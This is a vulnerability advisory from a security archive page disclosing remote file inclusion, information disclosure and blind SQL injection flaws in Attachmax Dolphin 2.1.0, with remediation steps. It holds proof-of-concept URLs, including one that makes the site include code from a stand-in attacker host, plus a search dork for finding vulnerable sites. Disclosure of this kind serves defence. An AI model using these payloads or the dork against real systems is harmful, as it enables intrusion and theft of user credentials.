exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Attachmax Dolphin 2.1.0 Remote File Inclusion / SQL Injection

Attachmax Dolphin 2.1.0 Remote File Inclusion / SQL Injection
Posted Jan 16, 2011
Authored by ph03nix

Attachmax Dolphin versions 2.1.0 and below suffer from remote file inclusion, information disclosure, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, code execution, sql injection, file inclusion, info disclosure
SHA-256 | 742ecc2ca9a40e8b5f9cc418dae1e8260fa65eb9c65347e223a0f1c863062b45

Attachmax Dolphin 2.1.0 Remote File Inclusion / SQL Injection

Change Mirror Download
Author : ph03nix
Date : january 2011
Location : Indonesia
Web : https://www.pho3nix.co.tv
Critical Lvl : High
Impact : System access
Where : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Attachmax Dolphin
version : <= 2.1.0
Vendor : https://www.attachmax.com/
Description :

Attachmax allows you to run your very own youtube Video Community site, just
like popular Videos sites
such as youtube, dailymotion and revver. Additionally Attachmax includes the
ability for Images and Files,
following the trend of other popular File Sharing communities such as Imageshack
and Rapidshare.
So not only do you get a fully functional Video Script, but a complete File
Sharing Website.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

1. Remote File Inclusion Vulnerability

Input passed to the "rel_path" parameter in config.php page is not properly
verified before being used
to include files.This can be exploited to include arbitrary files from local or
external resources.
Successful exploitation requires that "register_globals" is enabled.


Poc/Exploit:
~~~~~~~~~~
https://www.example.com/[path]/config.php?rel_path=https://www.attacker.com/evil?


2. File info disclosure Vulnerability

File info.php in main folder not protected to see directly from browser and
could allow an attacker
to obtain sensitive information from the server.

Poc:
~~~~
https://www.example.com/[path]/info.php


3. Blind SQL Injection Vulnerability.

Input passed to the "category" parameter in search.php page is not properly
verified before being used
in an sql query.
This can be exploited thru the browser to manipulate SQL queries and pull the
username and password
from users in plain text.

Poc/Exploit:
~~~~~~~~~~~~
https://www.example.com/[path]/index.php?page=Search&category=[BlindSQL]



Dork:
~~~~~
inurl:"controller.php?page=profile"


Solution:
~~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn off register_globals in php.ini
- Rename info.php.




Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close